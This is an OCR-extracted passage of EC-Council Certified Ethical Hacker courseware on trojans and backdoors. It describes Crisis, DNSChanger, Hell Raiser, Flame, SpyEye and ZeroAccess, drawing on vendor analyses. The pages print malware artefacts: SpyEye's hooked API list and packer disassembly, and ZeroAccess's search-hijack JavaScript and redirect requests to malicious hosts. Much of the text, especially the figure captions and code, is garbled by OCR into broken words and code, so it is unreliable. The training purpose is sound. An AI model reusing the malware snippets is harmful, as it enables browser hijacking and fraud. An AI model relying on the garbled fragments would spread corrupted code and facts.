the OSX.Crisis: 9 Monitor Skype audio traffic Q Monitor Safari or Firefox to record websites and capture screenshots 0 Record conversations in MS Messenger and Adium 9 Send files to the command and control server Module 06 Page 918 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 93. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker MAC OS X Trojan: DNSChanger c EH (•rtifwtf ithnai Nm Im jan uses social engineering techniques to make users download the program and run malicious code The malware modifies the DNS settings of the active network. The users are forced to download codecs or other movie downloads through QuickTime, etc. Once the download is finished, then the Trojan is attacked, resulting in slow access to the Internet, unnecessary ads popping up on the screen of the computer, etc. This Trojan uses social engineering techniques to make users download the program and run malicious code. FIGURE 6.37: Attacker injecting MAC OS X Trojan in victim's system through downloads and prompt Module 06 Page 919 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 94. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker MAC OS X Trojan: DNSChanger (Cont’d) Q £H Uif | It K lcM r M hJ U t i k MAC OS X T rojan: D N S C hanger (C ont’d) After the user downloads the false codec, the process of tricking and retrieving the user's information continues as follows: 0 DNS settings: Local machine's DNS settings are changed to attacker's IP address 0 Playing a video: After the fake codec is installed, a video is played so as not to raise suspicions 9 HTTP message: A notification is sent to the attacker about the victim's machine using an HTTP post message 9 Complete control: Hackers take complete control of the victim's MAC OS X computer Module 06 Page 920 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 95. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker C EH M a c OS X T ro ja n : H e ll R a is e r (■WM I ■ HMul H d • a■ Hell Raiser allow s an attacker to gain access to the victim system and send pictures, pop up chat messages, transfer files to and from the victim s system, com pletely m onitor the victim s operations, etc. Chat interface U 6C nAXQftO « T DC DC Victor's parameters ;17*S (________ OSCONNtCT________ *1 HI to ► ‫ •*׳‬h • n < ■ • dlX fin g 1 to• p«n«m n ‫•!»»• ״ 1 0י״0 ׳ז‬ (1 ‫ג‬ 5it— . . ... ----•--jt Note: The complete coverage of MAC OS X hacking is presented in a separate module Copyright 0 by IG Council. All Rights Reserved. Reproduction is Strictly Prohibited M ac OS X T rojan: H ell R a ise r Hell Raiser is malware that gets onto the victim's system when clicked on, the user it is an innocent file. Once access has been gained to the victim's system, the attacker can send pictures, pop-up chat messages, can transfer files to and from the victim's computer, and even can turn ON and turn OFF the system from a remote location. Finally, victim operations can be completely monitored. Module 06 Page 921 Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 96. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T roj a n A n a ly s is : F la m e CEH Flame, also known as Flamer, sKyWlper, or Skywiper, is modular computer malware discovered in 2012 that attacks computers running the Microsoft Windows operating system The malware is used for targeted cyber espionage in Middle Eastern countries Flame can spread to other systems over a local network (LAN) or via USB stick It can record audio, screenshots, keyboard activity, and network traffic The program also records Skype conversations and can turn infected computers into Bluetooth beacons which attempt to download contact information from nearby Bluetooth-enabled devices Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited. & g‫־‬N O > T ro jan A nalysis: F la m e Source: http://www.kasperskv.com Flame, also known as Flamer, sKyWlper or Skywiper, is modular computer malware that attacks computers running the Microsoft Windows operating system. This malware is used for targeted cyber espionage. It can spread to other systems over a local network (LAN) or via USB stick. It can record audio, screenshots, keyboard activity, and network traffic. It also records Skype conversations and can turn infected computers into Bluetooth beacons that attempt to download contact information from nearby Bluetooth-enabled devices. The following diagram depicts how an attacker succeeds in installing Flame on a victim's system. Sends data to attacker «» © o © Redirects to malicious server *‫•״‬ • ................. © ‫׳‬ J © Malware Server Downloads a malware @> Command and Control Center Attacker © Provides a instruction to get data Sets command and control center f ) U M ■m 3 © Infects other hardware in LAN. Infected Hardware in LAN In order to inject a Trojan onto the victim's system and to gain sensitive information, attackers first set a command and control center and a malware server. Next, the attacker sends a Module 06 Page 922 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 97. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker phishing email to the victim's system and lures him or her to open the link. Once the attacker opens the link, he or she is redirected to the malicious server. As a result, the malware gets downloaded onto the victim's system and the system is infected. This infected machine infects the other hardware connected on the LAN. Thus, the commands from the control and command center are sent to and received from the infected hardware LAN. According to the received commands, the infected hardware LANs send the data to the control and command center. Module 06 Page 923 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 98. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T roj a n A n a ly s is : F la m e c gh ( Co n t ’d) ‫—יי *י‬ ‫י-י‬ The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence last week Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012 During the past 4 years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland The Flame C&C domains were registered with a list of fake identities and with a variety of registrars, going back as far as 2008 According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific 0 B The Flame attackers seem to have a high interest in PDF, Office, and AutoCad drawings B The data uploaded to the Flame C&C is encrypted using relatively simple algorithms; stolen documents are compressed using open source Zlib and modified PPDM compression ‫ש‬ Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame ht :/wwa esy o tp / w.kiprk.cm Copyright O by E6-6«ncil. Ail Rights Reserved. Reproduction is Strictly Prohibited. T ro jan A nalysis: F la m e (C ont’d) Source: http://www.kasperskv.com Kaspersky Lab summarizes the results of the analysis about Flame as follows: 9 The Flame C&C infrastructure, which had been operating for years, went offline immediately after Kaspersky Lab disclosed the discovery of the malware's existence recently. 9 Currently there are more than 80 known domains used by Flame for C&C servers and its related domains, which have been registered between 2008 and 2012. 9 During the past four years, servers hosting the Flame C&C infrastructure moved between multiple locations, including Hong Kong, Turkey, Germany, Poland, Malaysia, Latvia, the United Kingdom, and Switzerland. 9 The Flame C&C domains were registered with an impressive list of fake identities and with a variety of registrars, going back as far as 2008. 9 According to Kaspersky Lab's sinkhole, infected users were registered in multiple regions including the Middle East, Europe, North America, and Asia-Pacific. 9 The Flame attackers seem to have a high interest in PDFs, Office, and AutoCad drawings. 9 The data uploaded to the Flame C&C is encrypted using relatively simple algorithms. Stolen documents are compressed using open source Zlib and modified PPDM compression. Module 06 Page 924 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved, Reproduction is Strictly Prohibited.
  • 99. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Windows 7 64 bit, which we previously recommended as a good solution against infections with other malware, seems to be effective against Flame. Module 06 Page 925 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 100. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker F la m e C & C S e rv e r A n a ly s is CEH («rt1 fw4 ItkNjI lUilwt Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQL database on Apache 2.x web server J «P W« P * ■ ‫.*•י‬ !.. ► with self-signed certificates It was accessible over the HTTPS protocol, ports 443 and 8080 The document root directory was /var/www/htdocs/, which has sub-directories joaa'itl 'jg »Tt M4» ff»PO a eX a and PHP scripts An infected machine was controlled using a message-exchange mechanism based on data Contents of the /var/www/htdocs/newsforyou/ directory Control !*unci containers files l » • ‫־־'״‬ •‫•־‬ UM a »* ‫-״‬ Donmlonil dal j * :V ‫ל‬ Control panel interface h t tp : //w w w .k a s p e r s k y .c o m Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited S p F la m e C&C S erver A nalysis Source: http://www.kaspersky.com Flame's C&C Server was running on 64-bit Debian 6.0.x OS under OpenVZ and using PHP, Python, and bash programming languages with MySQL database on Apache 2.x web server with self-signed certificates. This server configuration was a typical LAMP (Linux, Apache, MySQL, PHP) setup. It was used to host a web-based control panel as well as to run some scheduled fully automated scripts in the background. It was accessible over the HTTPS protocol, ports 443 and 8080. The document root directory was /var/www/htdocs/, which has sub-directories and PHP scripts. While the systems had PHP5 installed, the code was made to run on PHP4 as well. For example, /var/www/htdocs/newsforyou/Utils.php has the "str_split" function defined that implements the "str_split" function logics from PHP5, which was not available in PHP4. The developers of the C&C code most likely implemented compatibility with PHP4 because they were not sure which one of two major PHP versions would be installed on the C&Cs. Module 06 Page 926 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 101. Ethical Hacking and Countermeasures Trojans and Backdoors Module 06 Page 927 Exam 312-50 Certified Ethical Hacker Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 102. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker F la m e C & C S e rv e r A n a ly s is r ‫ש‬u (C o n t’d) Certified | ttfcxjl »U*b« 0 C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP C O M M A N D A N D CONTROL SER V ER FL (Flam e) PROTOCOLS t> L OldPRotocol •-> OldProtocollE RedProtocol N yet im ented ot plem CLIENTS 1‫י‬ ‫י‬ i : HTTP, HTTPS i ■f> SignupProtocol i __________ s Clients and Protocols relations found in this Flame C&C h ttp : //w w w .k o s p e r s k y .c o m Copyright © by EG-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited. F lam e C&C S erver A n aly sis (C ont’d) Source: http://www.kaspersky.com C&C can understand several communication protocols including OldProtocol, OldProtocolE, SignupProtocol, and RedProtocol to talk to different clients codenamed SP, SPE, FL, and IP. A typical client session handled by the C&C started from recognition of the protocol version, then logging of connection information, followed by decoding client request and saving it to the local file storage in encrypted form. All metadata about files received from the client was kept in a MySQL database. The C&C script encrypts all files received from the client. The C&C uses a PGPlike mechanism to encrypt files. First, the file data is encrypted using the Blowfish algorithm in CBC mode (with static IV). The Blowfish key is generated randomly for each file. After file encryption, the Blowfish key is encrypted with a public key using asymmetric encryption algorithm from the openssl_public_encrypt PHP function. Module 06 Page 928 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 103. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker COMMAND AND CONTROL SERVER FL (Flame) PROTOCOLS OldPRotocol SP CLIENTS ‫—יו‬ ‫״‬ RedProtocol Not yet implemented ‫­י‬ | SPE IP ­‫י‬ I G ■ ‫׳‬ > OldProtocollE Internet: HTTP, HTTPS ■ • SignupProtocol ‫׳‬ > FIGURE 6.39: Clients and protocol relations found in this Flame C&C Module 06 Page 929 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 104. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojan Analysis: SpyEye J CE H The Trojan makes use of user mode rootkit techniques to hide both its registry key located nsdeHKEY_CURRENT_USERSOFTWAREMicrosoft WindowsCurrent VersionRun and the fo ld er containing th e Trojan executable and the configuration file config.bin J The folder is usually located in th e root directory of th e d rive w h ere the operating system is located SpyEye is able to inject code in running processes and can perform the following C YWflHXAV e4|*‫״‬ bl)|WlNINt I iri •A CVw»CKM55»xccr0:^#l0Cw0!458|s‫׳‬lNINET d 1 PS0n<fi0q.*xV lH 1 : V*lW)CNVS1yatew2wnloooricxf[G*0] rtdl H H num I'M erateVakjeKey C V/;lflO OAi'Swv1| *1132'»wntowr1«x«(&tO ‫>׳‬ ] ‫׳‬Jl.dllNlQuw|On*ctcnFU C^»JW^5‫־‬ wt«22«‫^׳‬nk>ooaoxc(&<0ir*dl.dllN(Ro0ir«Tlro:d C W*M XM ^l«‫*־‬G*nbpm.x‫(״‬UO] rMI < N - 1foimalcnF1 IH I'i tl W CWIHOCN,/S.^t*11:Cl «r1 ju 1 *x - 0 ‫׳‬Wl.dl'NlVJiCorf.iiJ k u 1 »(6 < 1 C VXwntooon^x^lUDJ keirvslWdMI1JsNr!slrjr,lwrC0ctw CV/;»JWW‫^:־‬h‫׳»״‬a U n b ? .a-x»{E4D)ADVAPl3?«IIIC‫>׳‬ p1rncli.(< C V1‫ ״‬n00w‫־‬s^< 1»‫׳‬n32l», nlooor1axc(&40] CPrPT 32.dl'FF> ‫ ־‬o C 1 $ fe ‫׳‬ ‫:׳‬lnp r1 © 1 tC C^INOOw/S1yatefnX^nboorexfl&*Clj USER32 dl 11aruto!eM 0; e*M C VW *C»O '/Sjv*1»r..S2V^r1lt»yc»rw N #x*{&*0)W S2_32 dlivrd CV.vlfJOOWSNMWttiS^nbooaaxeiE^Ojv/ININEr.dlllrttoiiwtQuooOoiiwtf - V/!ylHOCNVjty5lB1n^V»nbgQrvexe{fciOJW E T dill litf-fJprt1f‫ 1|* ־‬W INIM l1 *?1 CVWt®Ow‫׳‬S^terH‫״^2־‬nbgor^x»{&*01WINIMEr.dllHK1/vjtPtq^«HB. C V »»OWS»y«le1»32>‫»׳‬nbo0fexc(6<OJW /‫׳‬ INIME r dlllnlc11v;ICbKHandc C V^tJOtWLVsyjIrfn'iJVwnb^inexrtUU]WININE rdllHltfSeivflrcf.‫^ ״‬ CYw»®OWSMten#32^wboor1axef&40iv,lINII'IEr.dl!HRc$ar1:Roau«ft .. functions: © Capture network traffic t> Send and receive network packets in order to bypass application firewalls e Hide and prevent access to the startup registry entry e Hide and prevent access to the binary code //H /l'iA U d/n *POBAEBXB 77211 D 8 B 0 JM&06/£E29t 8 6 v< 9 7C90D 0 Byte* WPO&tDKSB 9TC 7C30C-F9E8B*■ JMP0&E2DC2 *. 7C90E4$c 9 B*ec » :BAP 50^ 'P ?D30E5D9B Bytoi jMP0B*O7:CS 7C30E9758 JkFC8«2E78 7 3 ?78 y JM CAnJI & )2 B W P B 03 77DnfEB0n>r, JMTT^&r^n 77AEF74B8 S / « JKF:BW E8> 77D48f:l l 0f:y* .‫ י‬JMPQBA0930: 7lAB42a&8B,«.v .KP<»*£AS5 77IB81A78 8*et J»«F C8*E?8«D 771C4ACSBB>*e1 MP0B4£/Asa 771C54CA8B,t»r .HP<*Oi>S33 771C61DC8Byle1 JMP0F/C9415 771C?68B5 0/h [EB. 01. C E5 7 77IC768E 2 B*et )•1.941 &XHG E _ API functions hooked by the Trojan within the winlogon.exe virtual address space © Hide the own process on injected processes e Steal information from Internet Explorer and Mozilla Firefox http://techblog.avira.com Copyright © by EG-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. A T ro jan A nalysis: SpyEye Source: http://techblog.avira.com The Trojan makes use of user mode rootkit techniques to hide both its registry key located inside HKEY_CURRENT_USERSOFTWAREMicrosoftWindowsCurrent VersionRun and the folder containing the Trojan executable and the configuration file config.bin. The folder is usually located in the root directory of the drive where the operating system is located. SpyEye is able to inject code in running processes and can perform the following functions: 9 Capture network traffic 0 Send and receive network packets in order to bypass application firewalls Q Hide and prevent access to the startup registry entry Q Hide and prevent access to the binary code 9 Hide the own process on injected processes e Steal information from Internet Explorer and Mozilla Firefox Module 06 Page 930 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 105. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker The following API functions are hooked by the Trojan within the winlogon.exe virtual address space: text text text text text text text .text text text text text .text text text text text text C:WINDOWSSystem32Salgexel4681WININETdllMnternetReadFileExA C:WINDOWSSystem32alg exe[468] WININET dlllHttpSendRequestW C: W I ND 0 WS system32winlogon. exe[840) ntdll dll! NtE numerateValueKey C: W I ND 0 WS system32winlogon. exe[640j ntdll. dll! NIQuetyD irectotyFile C: W I ND 0 W Ssystem32w1nlogon exe[640j ntdll dll! NtR esumeT hread C: W I ND 0 WS system32winlogon. exe[640j ntdll dll! NtS etl nformationFile CAWIN D 0 WS system32winlogon. exe[640] ntdll. dll! NtVdmControl C: W I ND 0 WS system32winlogon. exe[640j kernel32. dll! Flushl nstructionCache C: W I ND 0 WS system32winlogon. exe[640] ADVAR 32. dll! CtyptE ncrypt C: W I ND 0 WS system32winlogon. exe[840] CRYPT 32. dll! PFXI mportCertS tore C: W I N D 0 WS system32winlogon. exe[640] US ER 32. dll! T ranslateM essage C: W I ND 0 WS system32winlogon. exe[640] WS2_32. dll! send C: W I ND 0 WS system32winlogon. exe[640] W l NIN ET.dll! InternetQ uetyO ptiorA C:WIND0WSsystem32winlogon. exe[840] WININET dll! H ttpO penR equestA C:WIND0WSsystem32winlogon. exe[840] WININET dll! H ttpAddR equestH e... C: W I ND 0 WS system32winlogon. exe[640] W l NIN ET dll! InternetCloseH andle C: W I ND 0 W Ssystem32winlogon exe[640) W l NIN ET dll! HttpS endR equestA C:WIND0WSsystem32winlogon. exe[640] WININET dll! HttpSendR equestA . 771F7E9A 8 Bytes JMP 0BAEB2E6 77211808 8 Bytes JMP 0BAEE296 7C90D97G 8 Bytes JMP 0BAD769B 7C90DF5E 8 Bytes JMP 0BAE2DC2 7C90E45F 8 Bytes JMP 0BAF1507 7C90E5D9 8 Bytes JMP 0BAD73E5 7C90E975 8 Bytes JMP 0BAE2E78 7C839277 8 Bytes JMP 0BAD7831 77DF1558 8 Bytes JMP 0BAEA0E1 77AEF748 8 Bytes JMP 0BADE8QA 77D48BCE 8 Bytes JMP 0BAD930C 71AB428A 8 Bytes JMP 0BAEA9B5 771B81A7 8 Bytes JMP 0BAE7B9D 771C4AC5 8 Bytes JMP 0BAE7A88 771C54CA 8 Bytes JMP 0BADA638 771 CGI DC 8 Bytes JMP0BAE8415 771C76B8 5 Bytes [EB. 01, C3. E 9 .7. 771C76BE 2 Bytes [92,94] {XCHG E FIGURE 6.40: API functions hooked by the Trojan within the winlogon.exe virtual address space Module 06 Page 931 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 106. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Trojan Analysis: SpyEye CE H (C ont’d) A fter execution the Trojan connects to a push push push push push le a push push push c a ll le a u e re tn server and sends som e inform ation ab ou t th e system to the server like: © MD5 of the executed sample 6 Operating system version © Computer name 9 Internet Explorer version 8 Username © Version number of the malware □ □ □ ^ ‫כ‬ Z] ^ ‫כ‬ ^ svchost exe svchostexe svchost exe System System System System System wniogon exe 1096 1272 1052 4 4 4 4 4 660 UDP UDP UDP TCP TCP UDP UDP UDP TCP eax i*i*6547i*Bh 4969h 3367h 5047h e c x , [eb p - 1Ch] ecx duord p t r [eb p -O C h] duord p t r [e b p - 1 0h] sub 42F851 Malware is packed with UPX and a polymorphic decryptor 00e5f6a15 00e5f6e15 00e5t8a15 00e5f$al5 00e5#6a15 00e5#6a15 00e5f6a15 00e5t6a15 00e5t6a15 1034 1900 1032 nettxos-ssn rwcfosoftck netb»os-«$ netb*os-dgm rmcjosottds 1083 ‫י‬ ■ ■ ‫י‬ ‫י‬ 0 0 ■ ■ reve*se-m tl-76-76-98-82 gogax com ■ https 00e5f$a15 00e5f6a15 USTENING USTENING sy n . sen t M alware injected piece of code within winlogon.exe virtual address space http://techblog.avira.com ---------Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited. T ro jan A nalysis: SpyEye (C ont’d) Source: http://techblog.avira.com After execution, the Trojan connects to a server and sends some information about the system to the server such as: 0 MD5 of the executed sample 0 Operating system version 0 Computer name 0 Internet Explorer version 0 User name © Version number of the malware 3 □ □ ID 3 svchost exe svchost exe svchost.exe System System System ^ System ^ System ^ winlogon exe Z 3 1096 1272 1052 4 4 4 4 4 660 UDP UDP UDP TCP TCP UDP UDP UDP TCP 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 00e5f6a15 1034 1900 1032 netbios-ssn m ciosoft-ds netbios-ns netbios-dgm rm ciosott-ds 1063 ­ ‫י‬ ■ ■ 00e5f6a15 00e»6a15 ■ ‫י‬ ■ reve»se-m tl*76-76-9882‫ ־‬gogax com " " 0 0 “ " " hltps USTENING USTENING SYN_SENT FIGURE 6.41: Malware injected piece of code within winlogon.exe virtual address space Module 06 Page 932 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 107. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker Malware is packed with UPX and a polymorphic decryptor. In the code snippet that follows, you can see a call to another routine after the end of the usual UPX decryption: call sub 42F851. push push push push push push lea push push push call lea ue retn eax 44651*74Bh 496 9h 3 3 6 7h 5 047 h ecx, [ebp -1 Ch] ecx dijord ptr [eb p-O Ch ] d u o rd ptr [e bp-10h] subJ*2F851 FIGURE 6.42: Malware is packed with UPX and a polymorphic decryptor Module 06 Page 933 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 108. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T ro ja n A n a ly sis: Z ero A c c e ss CEH («rt1fw4 itfcwal Nm Im ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud It arrives through various vectors, including web exploit kits and social engineering attacks, and uses low-level rootkit functionality to remain persistent and stealth ZeroAccess downloads fake security software, performs click fraud and search engine poisoning SSSE39 jwon: lcc learn ■Uddtot N ovkt Example advertisement for the Clicklce payper-dick network I-O rtt *v»xi5 U • ckklic Pay P dtk er Dear sirs! W* proud to armour*.• 4 ‫ *••זו‬modem tokAum h• POC 04ffc.. cafed Cfecklc* PPC clickicocom CMcklce Team ncfcides professionals of vanous liekJs. who are woriong every day to make th« PPC even better tor you. Apart from generous bids. Cbddce P K offers you tf*e fo*o*nng: 1. Advanced f*«d vvrwon 2. Our admnntratrve nterfaee mrixies a number or uOMies for traffic proeesartg. S. To *•irjjlify your work «M 6tat*tKt, > * pouAitv to choo•• CMf-baMd lira• »Uft for it. th t 4. An entire eoaecttcn of fee< «s prowled (PTip feeds. PuMc feeds, image feeds, Javascript and XML feeds). ts 5. Databases of specwlued keywords aro prowtod. ■ is afco posutHe to obtan niche-specific customuod keyword baset froc of charge based t on webmaster's criteria. 0. Our a4>port can be reached via ICQ. live Chat, e*mal or ticket system. Just give it a try and then make an informed decision. :) dcbce.com http.//w ww.symantec.com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. T ro jan A nalysis: Z eroA ccess Source: http://www.symantec.com ZeroAccess, also known as "Smiscer" or "Max++ rootkit," is a malicious Windows threat used to generate revenue primarily through pay-per-click fraud. ZeroAccess uses low-level rootkit functionality to remain persistent and stealth. It arrives through various vectors, including web exploit kits and social engineering attacks. Although ZeroAccess contains generic backdoor functionality that could be used for multiple purposes, it has been observed downloading fake security software, performing click fraud, and searching engine poisoning. Click fraud schem e Upon infection, ZeroAccess will install additional payload modules, downloaded through its back door. Generally, this is an executable that performs click fraud. This click fraud scheme has been observed to utilize more than one pay-per-click affiliate network. Advertisers sign up with ad networks that in turn contract website owners who are willing to display advertisements on their websites in exchange for a small commission. The ad networks charge the advertisers for distributing and displaying their ads and pay the website owners a small commission each time a visitor views (pay-per-view) or clicks (pay-per-click) on the ads. Module 06 Page 934 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 109. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker • d c k lc e Pay Per Cfck Dear Srs! We are proud to announce a new modem solution for PPC tra ffic, ca led Ckcklce PPC clickice.com CUcklce Team includes professionals o f various fields, who are worlung every day to make this PPC even b e tte r for you. Apart from generous bids, Clicklce PPC offers you the fo lo w rx): 1. Webmasters Advanced feed version. 2 Our administrative interface includes a number o f utihbes for tra ffic processng. . 3 To swnplify your work w ith sta tistics, it is possible to choose GMT-based dme sh ift for it. . 4. An entire collection o f feeds is provided (Php feeds, Pubfcc Feeds, Image feeds, JavaScript and XML feeds). 5 Databases o f specialized keywords are provided; it is also posstole to obtavi mche-specific customized keyword bases free o f charge based . on webmaster's cnteria. 6. Our support can be reached via ICQ, Live Chat, e-mail or ticke t system. Just give it a try and then make an informed decision. :) cbck1ce.com FIGURE 6.43: Example advertisement for the Clicklce pay-per-click network Module 06 Page 935 Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 110. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T ro ja n A n a ly sis: Z ero A c c e ss (C ont’d) J In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks user's searches When an infected user searches in popular search engines, (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following: http: //suzuki111x [ .] an/r/redirect.p p 111 h ?Xd= 9de5404ac67a404a0ela775f212cd210 & = 9 & 1 0 sv= 5 o 5 1 8 4.x86 u 1 8 cv= 5 & 1 & s= 0 . 0 This causes an additional pop-up window or tab to be created, the new window or tab will contain search results for the original search query with hijacked links or additional content C EH Urt1fw4 ilhiul lUtbM An example of returned H TM L can be seen below function FormatRedirect(ref, title) { body = "<html><head> <title>" + title + "</title> </head><framesetxframe src= "http://" + ref + ""> </frameset></html>"; AddPage("www.google.com.hk/ search?q=car&hl=zh-CN&source= hp&gbv=l", 2, null, 0, "HTTP/1.1 200rnConnection: closer nCache-Control: no-cacher nPragma: no-cachernContentLength: " + body.length + "rnrn" + body); } FormatRedirect("kozanekozasearchsys tern.com/?search=car&subid=198&key=4 15db60c8aa81c 0bed€8", "car"); http://www.symontec.com Copyright © by EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited. ggjj T rojan A nalysis: Z eroA ccess (C ont’d) Source: http://www.symantec.com In addition to generating revenue through pay-per-click networks, ZeroAccess hijacks users' searches. When an infected user searches in popular search engines (including google.com, bing.com, icq.com, yahoo.com, ask.com, and aol.com), ZeroAccess sends an additional GET request similar to the following: http://suzukimxml‫־.־‬lcn/r/redirect.php?id=9de5404ac67a404a0ela775f212cd210&u=198&cv=l 50&sv=15&os=501.804.x86 This causes an additional pop-up window or tab to be created. The new window or tab will contain search results for the original search query with hijacked links or additional content. An example of returned HTML can be seen as follows. Module 06 Page 936 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 111. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker 1 : <jst> function FormatRedirect(ref, title) { body = "<html><head> <title>" + title + "</title> </head><framesetxframe src= ‫״‬http://‫ + ״‬ref + "‫>״‬ </frameset></html>"; AddPage("www.google.com.hk/ search?q=car&hl=zh-CN&source= hp&gbv=l",2,null, 0, "HTTP/1.1 200rnConnection: closer nCache-Control: no-cacher nPragma: no-cachernContentLength: " + body.length + "rnrn" + body); 4: } FormatRedirect( "kozanekozasearchsys tem.com/?search=car&subid=l98 &key=4 15db60c8aa81c 0bed68", "car‫;)״‬ FIGURE 6.44: An example of returned HTML Module 06 Page 937 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
  • 112. Ethical Hacking and Countermeasures Trojans and Backdoors Exam 312-50 Certified Ethical Hacker T ro ja n A n a ly sis: Z ero A c c e ss ( ^H (Cont’d) |f5ET / o a n p 9 1 l c m / ? 4 H T T P /1 .1 H o s t: l o v r r u 3 ta r d .o r g yL ‫ן‬ U se r-A g e n t: H o s i l l a / 5 . 0 A c c e p t: t e x t / x m l , a p p l i c a t i q A c c e p t- L a n g u a g e : e n - u s , e n ; q = 0 . 5 A c c e p t-E n c o d in g : g z i p , d e f l a t e A c c e p t-C h a ra e t: I S O - 8 8 5 9 - 1 ,u tf 8 ‫ ; ־‬q - 0 .7 ,* ;q * 0 .7 K e e p - A l i v e : 3 0 0 C o n n e c tio n : k e e p - a l i v e Main Attack URL s r Ie1n, t‫ ־‬eUS;t / hr vm l l. 8q. 1* .01 .39), t eGxetc/kpol/2 0n0 8; q0 301. 18 ‫ ״‬F limeafgoex/ /p2n.g0 ,.»0 /.‫3;1״‬q - 0 . 5 x t ; ai , • c h t x n l x b o d v x d i v i d - ' wag' x / d i v x d i v i d - ‫ י‬lat ‫ י‬x / d i v x d l v < a !v ld = ‫־‬r a j ‫/ < > ׳‬d lv x c l1 v | ^ T W ^ S b 2 7 ^ t ; u , ‫ . ״‬a , c t , o , ‫ . ־‬k , ‫ , נ , ־‬h , i . e . a c c e p t- e n c o d ln g : pa « _ ' 1 -1 1 .1 ‫״‬ c o n te n t- ty p e : a p p ii 0 ; q < h ; q + + ) ( o + - p ; c ‫ ״‬f . c h a r j s e r - A g e n t : mo z i111 a / 4 . 0 C __ ‫־‬a ( j / a ) ; k - p a t .s e I n t ( c , 1 6 ) ; « H o s t: l o v r f n u s ta r d .o r !A (amp,fid) ;KafbQ3LkY78Y« c c e p t: t e x t / h t m l , ? m a g 